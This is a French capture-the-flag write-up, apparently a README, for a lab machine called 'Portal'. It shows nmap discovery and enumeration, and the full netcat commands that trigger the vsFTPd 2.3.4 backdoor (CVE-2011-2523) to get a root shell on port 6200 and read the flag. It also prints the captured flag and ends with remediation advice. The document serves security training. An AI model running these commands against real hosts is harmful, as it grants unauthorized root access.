
Un guide détaillé de test d'intrusion et rapport d'exploitation pour la machine 'Portal', axé sur CVE-2011-2523 (Backdoor vsFTPd 2.3.4) pour obtenir un accès root.
⚠️ Ce projet est destiné uniquement à des fins éducatives et de tests autorisés.
L'accès non autorisé aux systèmes est strictement interdit.
SYAFIQ
Rôle : Responsable des tests de pénétration
| Phase | Outil | Description |
|---|---|---|
| Découverte | Nmap | Scanner le réseau pour les hôtes actifs |
| Énumération | Nmap | Identifier les services et versions |
| Analyse | Script NSE | Détecter une vulnérabilité connue |
| Exploitation | Netcat | Déclencher la backdoor |
| Post-exploitation | Terminal | Obtenir un accès root et récupérer le flag |
Scanner les hôtes actifs sur le réseau :
nmap -sn --unprivileged 10.150.150.10-30
✅ Résultat :
-8 hôtes détectés -Cible identifiée : 10.150.150.12
Scanner les ports et services ouverts :
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Résultats :
-Port 21 → FTP (vsftpd) -Port 22 → SSH (OpenSSH 8.2p1)
Vérifier la présence d'une vulnérabilité de backdoor FTP connue :
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Résultat :
-La cible est VULNÉRABLE -CVE-2011-2523 confirmée
Déclencher la backdoor en utilisant un nom d'utilisateur malveillant :
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Cela ouvre un shell root caché sur le port 6200
Se connecter à la backdoor et exécuter des commandes :
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
-Accès root obtenu -uid=0(root) confirmé
🏁 Flag capturé :
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
Mettez toujours à jour les services obsolètes (vsFTPd était vulnérable) Des services mal configurés peuvent compromettre l'ensemble du système Des scans simples peuvent révéler des vulnérabilités critiques -🛡️ Recommandations -🔄 Mettez à jour le service FTP vers la dernière version -🚫 Désactivez les services inutiles -🔐 Utilisez un pare-feu pour restreindre l'accès -📊 Effectuez des audits de sécurité réguliers -📚 Avertissement
❌ N'utilisez PAS ces connaissances pour des activités illégales.
« La sécurité n'est pas un produit, mais un processus. » — Testez, surveillez et améliorez constamment.